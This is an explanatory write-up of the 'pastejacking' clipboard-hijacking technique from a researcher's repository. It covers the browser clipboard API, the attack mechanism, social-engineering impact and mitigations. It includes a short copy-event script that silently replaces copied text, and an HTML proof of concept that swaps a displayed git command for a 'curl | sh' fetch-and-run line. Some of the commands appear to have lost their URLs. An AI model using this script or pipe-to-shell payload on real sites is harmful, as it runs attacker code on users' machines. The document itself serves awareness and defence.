Detailed Technical Analysis of "Pastejacking" by Dylan Ayrey


The GitHub repository by Dylan Ayrey explores a novel attack vector called "Pastejacking." This attack leverages clipboard manipulation to trick users into executing malicious commands by dynamically changing the text they copy and paste.

Key Technical Details:

  1. Clipboard API:

    • JavaScript Access: Modern browsers provide JavaScript-based APIs to interact with the user's clipboard. While these APIs facilitate better user experiences, they can be exploited to replace, modify, or augment clipboard content.
    • Event Handling: The oncopy event can be leveraged to detect when a user copies content, allowing JavaScript to intercept this action and alter clipboard contents.
  2. Concept:

    • User Expectations vs. Reality: Users often presume that the text they highlight and copy will remain unchanged. However, by manipulating the clipboard content programmatically, an attacker can introduce commands that are executed when pasted into a terminal or command prompt.
    • Non-Visible Changes: Using hidden HTML elements or setting clipboard content directly via JavaScript without displaying changes on the screen helps maintain the user's trust.
  3. Attack Mechanism:

    • Code Injection: An attacker can trick a user into copying seemingly harmless commands from a webpage. Once copied, the clipboard content is dynamically altered to include malicious commands.
    • Event Listener Example: javascript document.addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'malicious_command_here'); e.preventDefault(); }); This modifies the copied content in the user's clipboard.
  4. Practical Demonstration:

    • The repository contains a proof of concept (POC) demonstrated using a simple HTML page that replaces copied text with a harmful command: html <html> <body> <pre id="instructions">Run this command in your terminal: git clone && cd repo</pre> <script> document.addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl | sh'); e.preventDefault(); }); </script> </body> </html> In this example, the visually displayed git clone command is replaced by a malicious curl command targeting a remote server.
  5. Impact:

    • Social Engineering: The effectiveness of pastejacking relies heavily on social engineering. Attackers must create a context where users are expected to copy and execute commands without additional scrutiny.
    • Targeted Environments: Best suited for attacks on users working in command-line environments (e.g., developers, system administrators).
  6. Mitigations:

    • User Awareness: Educating users to scrutinize clipboard content before pasting, especially when sourced from unknown or untrusted web pages.
    • Browser Restrictions: Encouraging browser developers to implement stricter permissions and more transparent clipboard operations could mitigate the risk.
    • Security Tools: Using tools or scripts to sanitize clipboard content before execution.

Key Takeaways:


Pastejacking exemplifies how seemingly innocuous features like clipboard access can pose significant security risks when exploited. By understanding and mitigating such attacks, users and developers can ensure better security hygiene and enhance the resilience of web applications against social engineering threats.

For more details and the full POC, check out the GitHub repository.